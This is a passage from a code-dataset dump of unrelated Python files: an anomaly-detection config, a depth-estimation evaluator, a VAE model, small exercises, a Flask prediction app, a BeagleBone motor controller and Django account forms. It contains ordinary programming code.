Maybe move them to tmp\n \n 'model_path_list': model_path_list,\n 'metrics_path_list': metrics_path_list, \n 'visual_trajectory_list': visual_trajectory_list,\n \n 'nc':{\n 'model_name': exp['model_name'],\n 'model_name_binary_classifer': 'binary_network',\n 'data_coordinate_out': 'xywh',\n 'dataset_name': exp['data'], # avenue, st \n 'date': date,\n }, \n\n 'data_load':{\n 'avenue':{\n # These are good because these locations are perm unless I manually move them\n 'train_file': \"/mnt/roahm/users/akanu/projects/anomalous_pred/output_deepsort/avenue/train_txt/\",\n 'test_file': \"/mnt/roahm/users/akanu/projects/anomalous_pred/output_deepsort/avenue/test_txt/\",\n 'train_vid': '/mnt/roahm/users/akanu/dataset/Anomaly/Avenue_Dataset/training_videos',\n 'test_vid': '/mnt/roahm/users/akanu/dataset/Anomaly/Avenue_Dataset/testing_videos',\n 'pic_loc_test': '/mnt/roahm/users/akanu/dataset/Anomaly/Avenue_Dataset/frames_of_vid/test/'\n },\n\n 'st':{\n 'train_file':\"/mnt/roahm/users/akanu/projects/anomalous_pred/output_deepsort/st/train_txt/\",\n \"test_file\": \"/mnt/roahm/users/akanu/projects/anomalous_pred/output_deepsort/st/test_txt/\",\n 'train_vid': '/mnt/workspace/datasets/shanghaitech/training/videos',\n 'test_vid': '/mnt/roahm/users/akanu/projects/Deep-SORT-YOLOv4/tensorflow2.0/deep-sort-yolov4/input_video/st_test',\n 'pic_loc_test':'/mnt/workspace/datasets/shanghaitech/testing/frames'\n },\n 'hr-st':{\n 'train_file':\"/mnt/roahm/users/akanu/projects/anomalous_pred/output_deepsort/HR-ShanghaiTech/train_txt/\",\n \"test_file\": \"/mnt/roahm/users/akanu/projects/anomalous_pred/output_deepsort/HR-ShanghaiTech/test_txt/\",\n 'train_vid': '/mnt/workspace/datasets/shanghaitech/training/videos',\n 'test_vid': '/mnt/roahm/users/akanu/projects/Deep-SORT-YOLOv4/tensorflow2.0/deep-sort-yolov4/input_video/st_test',\n },\n },\n \n 'pkl_file':{\n 'avenue': \"/home/akanu/output_bitrap/avenue_unimodal/gaussian_avenue_in_{}_out_{}_K_{}.pkl\".format(hyparams['input_seq'],\n hyparams['pred_seq'],\n exp['K']),\n\n 'avenue_template': \"/home/akanu/output_bitrap/avenue_unimodal/gaussian_avenue_in_{}_out_{}_K_{}.pkl\",\n 'avenue_template_skip': \"/home/akanu/output_bitrap/avenue_unimodal/gaussian_avenue_in_{}_out_{}_K_{}_skip_{}.pkl\",\n\n 'st': \"/home/akanu/output_bitrap/st_unimodal/gaussian_st_in_{}_out_{}_K_{}.pkl\".format(hyparams['input_seq'],\n hyparams['pred_seq'],\n exp['K']),\n\n 'st_template': \"/home/akanu/output_bitrap/st_unimodal/gaussian_st_in_{}_out_{}_K_{}.pkl\",\n 'st_template_skip': \"/home/akanu/output_bitrap/st_unimodal/gaussian_st_in_{}_out_{}_K_{}_skip_{}.pkl\",\n \n \n }\n\n\n}\n","repo_name":"akanuasiegbu/Leveraging-Trajectory-Prediction-for-Pedestrian-Video-Anomaly-Detection","sub_path":"experiments_code/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":6011,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"40"} +{"seq_id":"25349315538","text":"from __future__ import absolute_import, division, print_function\n\nimport os\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import mean_absolute_error as MAE\nimport torch\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\nimport copy \n\nfrom layers import disp_to_depth\nfrom utils import readlines\nfrom options import MonodepthOptions\nimport datasets\nimport networks\n\ncv2.setNumThreads(0) # This speeds up evaluation 5x on our unix systems (OpenCV 3.3.1)\n\n\nsplits_dir = os.path.join(os.path.dirname(__file__), 
\"splits\")\n\n# Models which were trained with stereo supervision were trained with a nominal\n# baseline of 0.1 units. The KITTI rig has a baseline of 54cm. Therefore,\n# to convert our stereo predictions to real-world scale we multiply our depths by 5.4.\nSTEREO_SCALE_FACTOR = 5.4\n\n\ndef compute_errors(gt, pred):\n \"\"\"Computation of error metrics between predicted and ground truth depths\n \"\"\"\n thresh = np.maximum((gt / pred), (pred / gt))\n a1 = (thresh < 1.25 ).mean()\n a2 = (thresh < 1.25 ** 2).mean()\n a3 = (thresh < 1.25 ** 3).mean()\n\n rmse = (gt - pred) ** 2\n rmse = np.sqrt(rmse.mean())\n\n rmse_log = (np.log(gt) - np.log(pred)) ** 2\n rmse_log = np.sqrt(rmse_log.mean())\n\n abs_rel = np.mean(np.abs(gt - pred) / gt)\n\n sq_rel = np.mean(((gt - pred) ** 2) / gt)\n\n return [abs_rel, sq_rel, rmse, rmse_log, a1, a2, a3]\n\n\ndef batch_post_process_disparity(l_disp, r_disp):\n \"\"\"Apply the disparity post-processing method as introduced in Monodepthv1\n \"\"\"\n _, h, w = l_disp.shape\n m_disp = 0.5 * (l_disp + r_disp)\n l, _ = np.meshgrid(np.linspace(0, 1, w), np.linspace(0, 1, h))\n l_mask = (1.0 - np.clip(20 * (l - 0.05), 0, 1))[None, ...]\n r_mask = l_mask[:, :, ::-1]\n return r_mask * l_disp + l_mask * r_disp + (1.0 - l_mask - r_mask) * m_disp\n\n\ndef evaluate(opt):\n \"\"\"Evaluates a pretrained model using a specified test set\n \"\"\"\n MIN_DEPTH = 1e-3\n MAX_DEPTH = 80\n\n assert sum((opt.eval_mono, opt.eval_stereo)) == 1, \\\n \"Please choose mono or stereo evaluation by setting either --eval_mono or --eval_stereo\"\n\n if opt.ext_disp_to_eval is None:\n\n opt.load_weights_folder = os.path.expanduser(opt.load_weights_folder)\n\n assert os.path.isdir(opt.load_weights_folder), \\\n \"Cannot find a folder at {}\".format(opt.load_weights_folder)\n\n print(\"-> Loading weights from {}\".format(opt.load_weights_folder))\n\n filenames = readlines(os.path.join(splits_dir, opt.eval_split, \"test_files.txt\"))\n if opt.eval_validation:\n filenames = readlines(os.path.join(splits_dir, opt.split, \"val_files.txt\"))\n encoder_path = os.path.join(opt.load_weights_folder, \"encoder.pth\")\n decoder_path = os.path.join(opt.load_weights_folder, \"depth.pth\")\n visibility_net_path = os.path.join(opt.load_weights_folder, 'visibility_net.pth')\n encoder_dict = torch.load(encoder_path)\n img_ext = '.png' if opt.png else '.jpg'\n dataset = datasets.KITTIRAWDataset(opt.data_path, filenames,\n encoder_dict['height'], encoder_dict['width'],\n [0], 4, is_train=False, img_ext=img_ext)\n dataloader = DataLoader(dataset, opt.batch_size, shuffle=False, num_workers=opt.num_workers,\n pin_memory=True, drop_last=False)\n if opt.backbone == \"resnet\":\n encoder_type = \"resnet\"\n encoder = networks.ResnetEncoder(opt.num_layers, False)\n elif opt.backbone == \"mobile_net_v3\":\n encoder_type = \"mobile\"\n encoder = networks.MobileEncoder(False)\n elif opt.backbone == \"densenet\":\n encoder_type = \"densenet\"\n encoder = networks.DenseNetEncoder(121, False)\n if opt.depth_decoder == \"basic\":\n depth_decoder = networks.DepthDecoder(encoder.num_ch_enc)\n elif opt.depth_decoder == \"hr_depth\":\n depth_decoder = networks.HRDepthDecoder(encoder.num_ch_enc, encoder_type=encoder_type)\n\n if opt.predict_visibility:\n visibility_net = networks.VisibilityNet2(encoder.num_ch_enc)\n visibility_net.cuda()\n visibility_net.eval()\n visibility_net.load_state_dict(torch.load(visibility_net_path))\n\n model_dict = encoder.state_dict()\n encoder.load_state_dict({k: v for k, v in encoder_dict.items() if 
k in model_dict})\n depth_decoder.load_state_dict(torch.load(decoder_path))\n\n\n encoder.cuda()\n encoder.eval()\n depth_decoder.cuda()\n depth_decoder.eval()\n\n pred_disps = []\n pred_depths = []\n pred_max_depths = []\n gt_max_depths = []\n max_depths_mse = []\n fnames = []\n # color_imgs = []\n \n print(\"-> Computing predictions with size {}x{}\".format(\n encoder_dict['width'], encoder_dict['height']))\n import time\n start_time = time.time()\n with torch.no_grad():\n for data in tqdm(dataloader):\n input_color = data[(\"color\", 0, 0)].cuda()\n if opt.eval_return_result:\n # color_imgs.append(copy.deepcopy(data[(\"color\", 0, 0)]))\n fnames.append(data['filename'])\n if opt.post_process:\n # Post-processed results require each image to have two forward passes\n input_color = torch.cat((input_color, torch.flip(input_color, [3])), 0)\n\n features = encoder(input_color)\n output = depth_decoder(features)\n\n if opt.predict_visibility:\n output['max_depth'] = visibility_net(features)\n max_depth = output['max_depth'].reshape(-1,1,1,1)\n for d in output[\"max_depth\"]:\n pred_max_depths.append(d[0].item())\n for d in data[\"depth_gt\"].cpu().numpy():\n gt_max_depths.append(np.max(d))\n else:\n max_depth = opt.max_depth\n\n pred_disp, pred_depth = disp_to_depth(output[(\"disp\", 0)], opt.min_depth, max_depth)\n pred_disp = pred_disp.cpu()[:, 0].numpy()\n \n # if opt.eval_return_result:\n # pred_depth = pred_depth.cpu()[:, 0].numpy()\n # pred_depths.append(pred_depth)\n\n if opt.post_process:\n N = pred_disp.shape[0] // 2\n pred_disp = batch_post_process_disparity(pred_disp[:N], pred_disp[N:, :, ::-1])\n\n pred_disps.append(pred_disp)\n\n pred_disps = np.concatenate(pred_disps)\n end_time = time.time()\n print(f'Predicting duration {end_time-start_time}')\n\n else:\n # Load predictions from file\n print(\"-> Loading predictions from {}\".format(opt.ext_disp_to_eval))\n pred_disps = np.load(opt.ext_disp_to_eval)\n\n if opt.eval_eigen_to_benchmark:\n eigen_to_benchmark_ids = np.load(\n os.path.join(splits_dir, \"benchmark\", \"eigen_to_benchmark_ids.npy\"))\n\n pred_disps = pred_disps[eigen_to_benchmark_ids]\n\n if opt.save_pred_disps:\n if opt.eval_validation:\n output_path = os.path.join(\n opt.load_weights_folder, \"disps_{}_split.npy\".format(opt.split))\n print(\"-> Saving predicted disparities to \", output_path)\n np.save(output_path, pred_disps)\n else:\n output_path = os.path.join(\n opt.load_weights_folder, \"disps_{}_split2.npy\".format(opt.eval_split))\n print(\"-> Saving predicted disparities to \", output_path)\n np.save(output_path, pred_disps)\n \n output_path = os.path.join(\n opt.load_weights_folder, \"max_depth_{}_split2.npy\".format(opt.eval_split))\n print(\"-> Saving predicted max_depth to \", output_path)\n np.save(output_path, pred_max_depths)\n\n if opt.no_eval:\n print(\"-> Evaluation disabled. Done.\")\n quit()\n\n elif opt.eval_split == 'benchmark':\n save_dir = os.path.join(opt.load_weights_folder, \"benchmark_predictions\")\n print(\"-> Saving out benchmark predictions to {}\".format(save_dir))\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n\n for idx in range(len(pred_disps)):\n disp_resized = cv2.resize(pred_disps[idx], (1216, 352))\n depth = STEREO_SCALE_FACTOR / disp_resized\n depth = np.clip(depth, 0, 80)\n depth = np.uint16(depth * 256)\n save_path = os.path.join(save_dir, \"{:010d}.png\".format(idx))\n cv2.imwrite(save_path, depth)\n\n print(\"-> No ground truth is available for the KITTI benchmark, so not evaluating. 
Done.\")\n quit()\n\n gt_path = os.path.join(splits_dir, opt.eval_split, \"gt_depths.npz\")\n gt_depths = np.load(gt_path, allow_pickle=True, fix_imports=True, encoding='latin1')[\"data\"]\n\n print(\"-> Evaluating\")\n\n if opt.eval_stereo:\n print(\" Stereo evaluation - \"\n \"disabling median scaling, scaling by {}\".format(STEREO_SCALE_FACTOR))\n opt.disable_median_scaling = True\n opt.pred_depth_scale_factor = STEREO_SCALE_FACTOR\n else:\n print(\" Mono evaluation - using median scaling\")\n\n errors = []\n abs_rels = []\n ratios = []\n rs_gt_depths = []\n\n for i in tqdm(range(pred_disps.shape[0])):\n\n gt_depth = gt_depths[i]\n gt_height, gt_width = gt_depth.shape[:2]\n\n pred_disp = pred_disps[i]\n pred_disp = cv2.resize(pred_disp, (gt_width, gt_height))\n pred_depth = 1 / pred_disp\n \n \n if opt.eval_split == \"eigen\":\n mask = np.logical_and(gt_depth > MIN_DEPTH, gt_depth < MAX_DEPTH)\n\n crop = np.array([0.40810811 * gt_height, 0.99189189 * gt_height,\n 0.03594771 * gt_width, 0.96405229 * gt_width]).astype(np.int32)\n crop_mask = np.zeros(mask.shape)\n crop_mask[crop[0]:crop[1], crop[2]:crop[3]] = 1\n mask = np.logical_and(mask, crop_mask)\n\n else:\n mask = gt_depth > 0\n\n pred_depth = pred_depth[mask]\n gt_depth = gt_depth[mask]\n\n pred_depth *= opt.pred_depth_scale_factor\n if not opt.disable_median_scaling:\n ratio = np.median(gt_depth) / np.median(pred_depth)\n ratios.append(ratio)\n pred_depth *= ratio\n\n pred_depth[pred_depth < MIN_DEPTH] = MIN_DEPTH\n pred_depth[pred_depth > MAX_DEPTH] = MAX_DEPTH\n\n if opt.eval_return_result:\n pred_depths.append(copy.deepcopy(pred_depth))\n rs_gt_depths.append(copy.deepcopy(gt_depth))\n\n\n error = compute_errors(gt_depth, pred_depth)\n abs_rels.append(error[0])\n errors.append(error)\n\n if not opt.disable_median_scaling:\n ratios = np.array(ratios)\n med = np.median(ratios)\n print(\" Scaling ratios | med: {:0.3f} | std: {:0.3f}\".format(med, np.std(ratios / med)))\n \n mean_errors = np.array(errors).mean(0)\n if opt.predict_visibility:\n max_depth_mse = MAE(gt_max_depths, pred_max_depths)\n max_depth_abs_rel = np.mean(np.abs(np.array(gt_max_depths) - np.array(pred_max_depths))) / np.array(gt_max_depths)\n else:\n max_depth_mse = -1\n mean_errors = mean_errors.tolist()\n mean_errors.append(max_depth_mse)\n #print(max_depth_abs_rel)\n print(\"\\n \" + (\"{:>8} | \" * 8).format(\"abs_rel\", \"sq_rel\", \"rmse\", \"rmse_log\", \"a1\", \"a2\", \"a3\", \"md_mae\"))\n print((\"&{: 8.3f} \" * 8).format(*mean_errors) + \"\\\\\\\\\")\n print(\"\\n-> Done!\")\n \n if opt.eval_return_result:\n return rs_gt_depths, pred_depths, pred_disps, errors, ratios, pred_max_depths\n\nif __name__ == \"__main__\":\n options = MonodepthOptions()\n evaluate(options.parse())\n","repo_name":"huyduong7101/monocular_depth_estimation","sub_path":"evaluate_depth.py","file_name":"evaluate_depth.py","file_ext":"py","file_size_in_byte":11983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33869355140","text":"'''\nSefika Efeoglu\n'''\nimport tensorflow as tf\nimport numpy as np\nimport glob, random, os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\nclass VariationalAutoencoderConfigBase(object):\n '''Configuration General Class'''\n \n def __init__(self, config=1):\n \n if config == 2:\n self.encoder_filter = [4, 8, 16, 32]\n self.decoder_filter = [32, 16, 4, 3]\n elif config == 3:\n self.encoder_filter = [16, 32, 64, 128]\n self.decoder_filter = [64, 32, 16, 3]\n elif config == 4:\n 
self.encoder_filter = [64, 128, 256, 512]\n self.decoder_filter = [256, 128, 64, 3]\n elif config == 1:\n self.encoder_filter = [32, 64, 128, 256]\n self.decoder_filter = [128, 64, 32, 3]\n\n self.image = tf.placeholder(tf.float32, [None, 96, 96, 3], name='image')\n self.resized_image = tf.image.resize_images(self.image, [64, 64])\n tf.summary.image('resized_image', self.resized_image, 20)\n\n self.z_mu, self.z_logvar = self.encoder(self.resized_image,self.encoder_filter)\n self.z = self.sample_z(self.z_mu, self.z_logvar)\n self.reconstructions = self.decoder(self.z, self.decoder_filter)\n tf.summary.image('reconstructions', self.reconstructions, 20)\n\n self.merged = tf.summary.merge_all()\n\n self.loss = self.compute_loss()\n\n def sample_z(self, mu, logvar):\n eps = tf.random_normal(shape=tf.shape(mu))\n return mu + tf.exp(logvar / 2) * eps\n\n\n def compute_loss(self):\n logits_flat = tf.layers.flatten(self.reconstructions)\n labels_flat = tf.layers.flatten(self.resized_image)\n reconstruction_loss = tf.reduce_sum(tf.square(logits_flat - labels_flat), axis = 1)\n kl_loss = 0.5 * tf.reduce_sum(tf.exp(self.z_logvar) + self.z_mu**2 - 1. - self.z_logvar, 1)\n vae_loss = tf.reduce_mean(reconstruction_loss + kl_loss)\n return vae_loss\n\n def encoder(self, x, filter_list):\n x = tf.layers.conv2d(x, filters=filter_list[0], kernel_size=4, strides=2, padding='valid', activation=tf.nn.relu)\n x = tf.layers.conv2d(x, filters=filter_list[1], kernel_size=4, strides=2, padding='valid', activation=tf.nn.relu)\n x = tf.layers.conv2d(x, filters=filter_list[2], kernel_size=4, strides=2, padding='valid', activation=tf.nn.relu)\n x = tf.layers.conv2d(x, filters=filter_list[3], kernel_size=4, strides=2, padding='valid', activation=tf.nn.relu)\n\n x = tf.layers.flatten(x)\n z_mu = tf.layers.dense(x, units=32, name='z_mu')\n z_logvar = tf.layers.dense(x, units=32, name='z_logvar')\n return z_mu, z_logvar\n\n def decoder(self, z, filter_list):\n x = tf.layers.dense(z, 1024, activation=None)\n x = tf.reshape(x, [-1, 1, 1, 1024])\n x = tf.layers.conv2d_transpose(x, filters=filter_list[0], kernel_size=5, strides=2, padding='valid', activation=tf.nn.relu)\n x = tf.layers.conv2d_transpose(x, filters=filter_list[1], kernel_size=5, strides=2, padding='valid', activation=tf.nn.relu)\n x = tf.layers.conv2d_transpose(x, filters=filter_list[2], kernel_size=6, strides=2, padding='valid', activation=tf.nn.relu)\n x = tf.layers.conv2d_transpose(x, filters=filter_list[3], kernel_size=6, strides=2, padding='valid', activation=tf.nn.sigmoid)\n return x\n","repo_name":"sefeoglu/gym_self_drive","sub_path":"gym_self_drive/model/VAE_RL/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3342,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"19942711285","text":"pos = -1\n\ndef search(list, n):\n s = 0\n e = len(list) - 1\n\n while s <= e:\n m = (s + e) // 2 # // is used to get Integer Division\n\n if list[m] == n:\n globals()['pos'] = m\n return True\n elif list[m] < n:\n s = m + 1\n else:\n e = m - 1\n return False\n\n\nlist = [2, 3, 5, 6, 8, 9, 23, 34, 45, 67, 89, 90]\nn = 8\n\nif search(list, n):\n print(\"Found at\",pos)\nelse:\n print(\"Not Found\")","repo_name":"pmihsan/SampleCodes","sub_path":"Python/Searching and Sorting/BinarySearch.py","file_name":"BinarySearch.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1770306146","text":"from flask 
import Flask,render_template,url_for,request\r\nimport numpy as np\r\nfrom sklearn.pipeline import make_pipeline\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.preprocessing import OneHotEncoder\r\nfrom sklearn.compose import ColumnTransformer\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route('/', methods=['GET', 'POST'])\r\ndef home():\r\n    return render_template('home.html')\r\n\r\n@app.route('/prediction' , methods=['GET', 'POST'])\r\ndef prediction():\r\n    import pickle\r\n    model = pickle.load(open('model.pkl','rb'))\r\n    if request.method == 'POST':\r\n        IsFirstTime = request.form['IsFirstTime'] \r\n        MIP = request.form['MIP'] \r\n        Units = request.form['Units'] \r\n        OCLTV = request.form['OCLTV'] \r\n        DTI = request.form['DTI'] \r\n        OrigUPB = request.form['OrigUPB'] \r\n        OrigInterestRate = request.form['OrigInterestRate']\r\n        OrigLoanTerm = request.form['OrigLoanTerm']\r\n        CreditRange = request.form['CreditRange']\r\n        LTVRange = request.form['LTVRange']\r\n        RepayRange = request.form['RepayRange']\r\n        data = [IsFirstTime,MIP,Units,OCLTV,DTI,OrigUPB,OrigInterestRate,OrigLoanTerm,CreditRange,LTVRange,RepayRange]\r\n        input = np.array(data).reshape(1,-1)\r\n        predict = model.predict(input)\r\n        return render_template('home.html',predictValue = predict)\r\n    # on a plain GET there is no prediction yet, so just render the form\r\n    return render_template('home.html')\r\n    # return render_template('output.html',predictValue = 1)\r\n\r\n\r\nif (__name__ == '__main__'):\r\n    app.run(host='0.0.0.0',port=8080)","repo_name":"kumarsatwik25/end-to-end-ml-project","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"3680717253","text":"def read_input(filename):\n    with open(filename) as file:\n        content = file.readlines()\n    content = [line.rstrip() for line in content]\n    return content\n\nfilename = 'day13p1.txt'\n\ntime, buses = read_input(filename)\ntime = int(time)\nbuses = [int(bus) for bus in buses.split(',') if not bus == 'x']\n\nstarts = [(time // bus) * bus + bus for bus in buses]\nstarts_buses = zip(starts, buses)\nsoonest = min(starts_buses, key=lambda p: p[0])\nprint((soonest[0] - time) * soonest[1])\n","repo_name":"kencole/advent_of_code_2020","sub_path":"day13p1.py","file_name":"day13p1.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71322226041","text":"#Importing numpy\nimport numpy as np\n\n#filehandler object\nfile = open('numbers.txt', 'w+')\n\nl = [478, 256, 345, 231, 246, 781]\n\n#loop to write in file\nfor num in l:\n\tfile.write(str(num)+'\\n')\nfile.close()\n\nfile2 = open('numbers.txt','r')\nl2 = []\nfor line in file2:\n\tl2.append(int(line))\nfile2.close()\n\n#outputing the final result\nprint('Mean of Numbers: {0} \\nStandard Deviation of Numbers: {1}'.format(sum(l2)/len(l2), np.std(l2)))\n","repo_name":"ashsek/Competetive-Codes","sub_path":"Code Chef/mean.py","file_name":"mean.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"19068644277","text":"#!/usr/bin/env python3\n# Run the motors\n# Based on: https://github.com/mcdeoliveira/rcpy/raw/master/examples/rcpy_test_motors.py\n# import python libraries\n\nimport rcpy\nimport rcpy.motor as motor\nimport sys\nimport time\n\nclass Manual:\n    \n    # CONSTANT VARIABLES #\n    # CONTROL CONSTANTS #\n    BACKWARD = \"\\033[B\" # Down\n    FORWARD = \"\\033[A\" # Up\n    KILLSWITCH = \"^C\" # Select\n    LEFT = 
\"\\033[D\" # Left\n RIGHT = \"\\033[C\" # Right\n SELECT_MODE = \"3\" # Start / Pause\n THROTTLE_DOWN = \"4\" # Left Trigger\n THROTTLE_UP = \"6\" # Right Trigger\n \n # THROTTLE CONSTANTS (Forward and Backward) #\n DIRECTION_THROTTLE_BACKWARD = -1 # Negative to go backward\n DIRECTION_THROTTLE_FORWARD = 1 # Positive to go forward\n DIRECTION_THROTTLE_DEFAULT = DIRECTION_THROTTLE_FORWARD # The direction to start travelling in\n DUTY_THROTTLE_MAX = 1.0 # Max duty allowed for throttle\n DUTY_THROTTLE_STEPS = 10 # Number of 'gears' to max throttle\n DUTY_THROTTLE_ITERATION_VALUE = DUTY_THROTTLE_MAX / DUTY_THROTTLE_STEPS\n \n # TURN CONSTANTS (Left and Right) #\n DIRECTION_TURN_CENTER = 0 # Directional value to keep wheels straight\n DIRECTION_TURN_DEFAULT = DIRECTION_TURN_CENTER # The direction the wheels start in\n DIRECTION_TURN_LEFT = 1 # Directional value to turn wheels towards the left\n DIRECTION_TURN_RIGHT = -1 # Directional value to turn wheels towards the right\n DUTY_TURN_MAX = 1.0 # Max duty allowed for turning\n DUTY_TURN_STEPS = 30 # Number of steps before reaching max turn radius\n DUTY_TURN_ITERATION_VALUE = DUTY_TURN_MAX / DUTY_TURN_STEPS\n\n # CONSTRUCTOR #\n def __init__(self):\n self.direction = self.DIRECTION_THROTTLE_DEFAULT\n self.direction_turn = self.DIRECTION_TURN_DEFAULT\n self.duty_throttle = 0\n self.duty_turn = 0\n rcpy.set_state(rcpy.RUNNING)\n print(\"Manual Initiated.\")\n \n def change_direction(self, direction):\n if abs(direction) == 1: # Check if direction is either 1 or -1\n self.duty_throttle = 0 # Stop first\n self.direction = direction\n \n def check_hold(self, direction):\n if abs(direction) == 1 or direction == 0: # Check if direction is either 1, -1 or 0\n if self.direction_turn != direction: # If the input direction doesn't match the previously chosen...\n self.direction_turn = direction # ...change to new direction\n self.duty_turn = 0 # and reset the turn duty\n \n def decrease_throttle(self):\n if self.duty_throttle >= self.DUTY_THROTTLE_ITERATION_VALUE: # Check if duty is at least what will be subtracted\n self.duty_throttle = self.duty_throttle - self.DUTY_THROTTLE_ITERATION_VALUE # Iterate negatively\n else: # Duty is less than iteration value\n self.duty_throttle = 0 # Set duty to min\n\n def increase_throttle(self):\n if self.duty_throttle <= self.DUTY_THROTTLE_MAX - self.DUTY_THROTTLE_ITERATION_VALUE: # Check if duty is at most one iteration from max\n self.duty_throttle = self.duty_throttle + self.DUTY_THROTTLE_ITERATION_VALUE #Iterate Positively\n else: # Duty is greater than one iteration from max\n self.duty_throttle = self.DUTY_THROTTLE_MAX # Set duty to max\n\n def get_duty_throttle(self):\n return self.duty_throttle * self.direction # Return duty in the current direction\n \n def get_duty_turn(self):\n return self.duty_turn * self.direction_turn # Return duty in the current direction\n \n def kill(self):\n self.direction = 1\n self.direction_turn = 0\n self.duty_throttle = 0\n self.duty_turn = 0\n motor.set(1, 0)\n motor.set(2, 0)\n print(\"Killswitch activated.\")\n \n def read_key(self):\n key = sys.stdin.read(1)\n if ord(key) == 27:\n key = key + sys.stdin.read(2)\n elif ord(key) == 3:\n raise KeyboardInterrupt \n return key\n \n def turning(self, key):\n # TODO: Use 'keyboard' module to read multiple keys at once\n if (key == self.LEFT) ^ (key == self.RIGHT): # If keystrokes contain -EITHER- LEFT or RIGHT...\n if key == self.LEFT: # If it's LEFT\n self.check_hold(self.DIRECTION_TURN_LEFT)\n else: # If it's RIGHT\n 
self.check_hold(self.DIRECTION_TURN_RIGHT)\n \n if self.duty_turn <= self.DUTY_TURN_MAX - self.DUTY_TURN_ITERATION_VALUE: # If the next iteration is at most one iteration from max duty...\n self.duty_turn = self.duty_turn + self.DUTY_TURN_ITERATION_VALUE # Iterate\n else: # Value is greater than one iteration away from max duty\n self.duty_turn = self.DUTY_TURN_MAX # Set duty to its max value\n else: # Neither or both directions selected\n self.check_hold(self.DIRECTION_TURN_CENTER) # Set direction to straight and reset duty\n \ntry:\n m = Manual()\n\n m.change_direction(m.DIRECTION_THROTTLE_BACKWARD)\n m.increase_throttle()\n \n while rcpy.get_state() != rcpy.EXITING:\n \n m.turning(m.LEFT)\n motor.set(1, m.get_duty_turn())\n motor.set(2, m.get_duty_throttle())\n \n time.sleep(.1) # sleep some\n\nexcept KeyboardInterrupt:\n m.kill()\n pass\n \nfinally:\n print(\"\\nBye BeagleBone!\")","repo_name":"jadonk/BlueDonkey-old","sub_path":"experiments/motors.py","file_name":"motors.py","file_ext":"py","file_size_in_byte":5365,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"27896785804","text":"from django import forms\nfrom django.contrib.auth import password_validation\nfrom django.contrib.auth.forms import UserCreationForm, UserChangeForm\nfrom django.contrib.auth.models import User\nfrom .models import User_information\nfrom django.contrib.auth.views import LoginView\nfrom accounts.utils import COUNTRIES, UndergraduateDegreeChoice, CampusChoice\n\nclass SignUpForm(UserCreationForm):\n username = forms.CharField(\n label='Nombre de usuario',\n help_text='Requerido. 150 caracteres o menos. Letras, dígitos y @/./+/-/_ solamente.', \n max_length=152,\n required=True, \n widget=forms.TextInput(attrs={'class': \"form-control\", 'placeholder': 'Username', 'style': 'background-color: rgba(73, 80, 87, 0.1)'}),\n )\n\n email = forms.CharField(\n label=\"Correo electrónico\",\n max_length=254, \n required=True, \n widget=forms.EmailInput(attrs={'class': \"form-control\", 'placeholder': 'info@example.com', 'style': 'background-color: rgba(73, 80, 87, 0.1)'}),\n )\n \n password1 = forms.CharField(\n label=\"Contraseña\",\n strip=False,\n widget=forms.PasswordInput(attrs={'class': \"form-control\", 'placeholder': 'Password', 'style': 'background-color: rgba(73, 80, 87, 0.1)'}),\n help_text=password_validation.password_validators_help_text_html(),\n )\n\n password2 = forms.CharField(\n label=\"Confirma Contraseña\",\n strip=False,\n widget=forms.PasswordInput(attrs={'class': \"form-control\", 'placeholder': 'Password Confirmation', 'style': 'background-color: rgba(73, 80, 87, 0.1)'}),\n help_text=\"Ingrese la misma contraseña para verificación.\",\n )\n \n class Meta:\n model = User\n fields = ('username', 'email', 'password1', 'password2')\n\nclass LoginForm(LoginView):\n username = forms.CharField(\n label='Nombre de usuario',\n max_length=152,\n required=True, \n widget=forms.TextInput(attrs={'class': \"form-control\", 'placeholder': 'Username', 'style': 'background-color: rgba(73, 80, 87, 0.1)'}),\n )\n \n password1 = forms.CharField(\n label=\"Contraseña\",\n strip=False,\n widget=forms.PasswordInput(attrs={'class': \"form-control\", 'placeholder': 'Password', 'style': 'background-color: rgba(73, 80, 87, 0.1)'}),\n )\n\n class Meta:\n model = User\n fields = ('username', 'password')\n\n\nclass EditUserDataForm(forms.ModelForm):\n First_name = forms.CharField(\n label='Primer Nombre', \n max_length=30,\n required=True,\n 
widget=forms.TextInput(attrs={'class': \"form-control\", 'placeholder': 'Primer Nombre', 'style': 'background-color: rgba(233, 229, 200, 0.5)'}),\n        error_messages={'required': 'Por favor ingresa tu nombre.'},\n    )\n\n    Middle_name = forms.CharField(\n        label='Segundo Nombre', \n        max_length=30,\n        required=True,\n        widget=forms.TextInput(attrs={'class': \"form-control\", 'placeholder': 'Segundo Nombre', 'style': 'background-color: rgba(233, 229, 200, 0.5)'}),\n        error_messages={'required': 'Por favor ingresa tu segundo nombre.'},\n    )\n\n    Last_name = forms.CharField(\n        label='Apellido', \n        max_length=30,\n        required=True,\n        widget=forms.TextInput(attrs={'class': \"form-control\", 'placeholder': 'Apellido', 'style': 'background-color: rgba(233, 229, 200, 0.5)'}),\n        error_messages={'required': 'Por favor ingresa tu apellido.'},\n    )\n\n    Age = forms.IntegerField(\n        label='Edad', \n        required=True,\n        widget=forms.NumberInput(attrs={'class': \"form-control\", 'placeholder': '18', 'style': 'background-color: rgba(233, 229, 